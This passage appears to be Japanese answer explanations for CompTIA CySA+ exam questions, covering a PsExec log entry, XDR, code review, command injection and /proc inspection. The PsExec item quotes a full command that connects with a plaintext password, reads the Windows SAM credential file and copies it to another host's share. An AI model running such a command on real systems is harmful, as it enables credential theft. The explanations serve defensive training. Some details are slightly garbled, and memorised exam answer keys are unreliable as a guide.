出力には、ユーザーが PsExec を使用してリモート システムからパスワード ファイルをダウンロードしようとしたことを示すシステム ログのエントリが表示されます。PsExec は、ユーザーがリモート システム上でプロセスを実行できるようにするコマンド ライン ツールです。このエントリは、ユーザー「administrator」が次のパラメータを使用して PsExec を実行しようとしたことを示しています: \192.168.1.100 -uAdministrator -p P@ssw0rd -c cmd.exe /c type c:\windows\system32\config\SAM > \ 192.168.1.101\c$\temp\sam.txt これは、ユーザーがユーザー名「administrator」とパスワード「P@ssw0rd」を使用して IP アドレス 192.168.1.100 のリモート システムに接続しようとして、cmd.exe をリモート システムにアクセスし、コマンド「type c:\windows\system32\config\SAM > \192.168.1.101\c$\temp\sam.txt」を使用して実行します。このコマンドは、ローカル ユーザーのハッシュされたパスワードを含む SAM ファイルを読み取り、IP アドレス 192.168.1.101 を持つ別のシステム上のファイルに書き込もうとします。参考資料: CompTIA サイバーセキュリティ アナリスト (CySA+) 認定試験の目的 (CS0-002)、8 ページ。https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

XDR は、エンドポイント、ネットワーク、クラウド アプリケーション、電子メール セキュリティなどの複数のソースからデータを収集して分析し、高度な脅威を検出して対応するシステムであるため、XDR ログによってマルウェア感染が確認されます12。XDR は、攻撃チェーンとマルウェア感染のコンテキストの包括的なビューを提供します。ファイアウォール ログ、IDS ログ、および MFA ログは、ネットワーク トラフィック、侵入試行、またはユーザー認証に関する部分的または間接的な情報しか提供しないため、マルウェア感染を確認するのに十分ではありません。参考資料: Cyber​​security Analyst+ - CompTIA、XDR: MSP の定義と利点| WatchGuard ブログ、拡張検出と対応 - ウィキペディア

組み込みソフトウェア チームが実行時にエラーを適切に処理できるようにするには、コード レビューを実行することが最善の推奨事項です。コード レビューは、元の作成者以外の 1 人以上の開発者によってソース コードを検査および評価するプロセスです。コード レビューは、コードを展開または実行する前に、コード内のエラー、バグ、脆弱性、非効率性を特定して修正するのに役立ちます。コード レビューは、コードが実行時のエラー処理のベスト プラクティス、標準、ガイドラインに従っていることを確認するのにも役立ちます。

Web サーバー ログ内の疑わしい行は、サーバー上でコマンドを実行しようとする試みであり、コマンド インジェクション攻撃を示しています。参考資料: CompTIA CySA+ スタディ ガイド: 試験 CS0-003、第 3 版、第 5 章、197 ページ。CompTIA CySA+ CS0-003 認定学習ガイド、第 5 章、205 ページ。

/bin/ls -1 /proc/1301/exe は、プロセス ID 1301 に関連付けられた実行バイナリ ファイルへの絶対パス (./usr/sbin/sshd) を表示するコマンドです。この情報は、セキュリティ アナリストがバイナリが正式バージョンで変更されていないことを判断するのに役立ちます。これは侵害の兆候である可能性があります。/proc/1301/exe は、プロセス 1301 を開始するために使用された実行可能ファイルを指す特別なシンボリック リンクです。